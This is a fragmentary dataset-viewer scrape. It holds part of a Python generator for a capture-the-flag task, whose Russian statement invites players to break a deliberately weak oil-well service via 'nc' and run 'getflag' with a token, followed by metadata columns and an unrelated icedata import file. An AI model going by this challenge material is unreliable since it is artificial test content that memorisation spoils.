сколько нефти на какой скважине у него имеется.
С нефтью ещё ладно, куда ни шло, а вот программистом он был, мягко сказать, нехорошим. Рассказывали,
что через эту самую его программу можно как-то управлять скважинами, и даже получалось у кого-то.
Сейчас эти скважины даром никому не сдались, зато на его сервере можно найти кое-что полезное...
Чтобы получить флаг, нужно запустить **getflag** и передать ему токен первым аргументом.
Ваш токен: `{0}`
Пример: `./getflag {0}`
`nc oil.contest.qctf.ru 20001`
[oil](/static/files/w12b28c7aq/oil)
[oil.c](/static/files/w12b28c7aq/oil.c)
'''
def generate(context):
participant = context['participant']
token = tokens[participant.id % len(tokens)]
return TaskStatement(TITLE, STATEMENT_TEMPLATE.format(token))
| 552.914286
| 18,009
| 0.880271
| 703
| 19,352
| 24.229018
| 0.923186
| 0.001996
| 0.002466
| 0.002818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.535825
| 0.036482
| 19,352
| 34
| 18,010
| 569.176471
| 0.377668
| 0
| 0
| 0
| 0
| 0.26087
| 0.885283
| 0.830612
| 0
| 0
| 0
| 0
| 0
| 1
| 0.043478
| false
| 0
| 0
| 0
| 0.086957
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d3fbe0e60092a265b507994235de7efa82f63fcc
| 282
|
py
|
Python
|
icedata/datasets/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | 42
|
2020-09-14T18:28:02.000Z
|
2022-03-30T19:55:10.000Z
|
icedata/datasets/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | 103
|
2020-09-11T19:50:29.000Z
|
2022-03-15T13:07:10.000Z
|
icedata/datasets/__init__.py
|
ganesh3/icedata
|
16c26ea3d8f96b99357683849d6bd363bf12a827
|
[
"Apache-2.0"
] | 19
|
2020-09-11T19:26:50.000Z
|
2022-03-15T13:09:44.000Z
|
from icedata.datasets import birds
from icedata.datasets import coco
from icedata.datasets import fridge
from icedata.datasets import pennfudan
from icedata.datasets import pets
from icedata.datasets import voc
from icedata.datasets import biwi
from icedata.datasets import ochuman
| 31.333333
| 38
| 0.858156
| 40
| 282
| 6.05
| 0.3
| 0.363636
| 0.628099
| 0.826446
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113475
| 282
| 8
| 39
| 35.25
| 0.968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.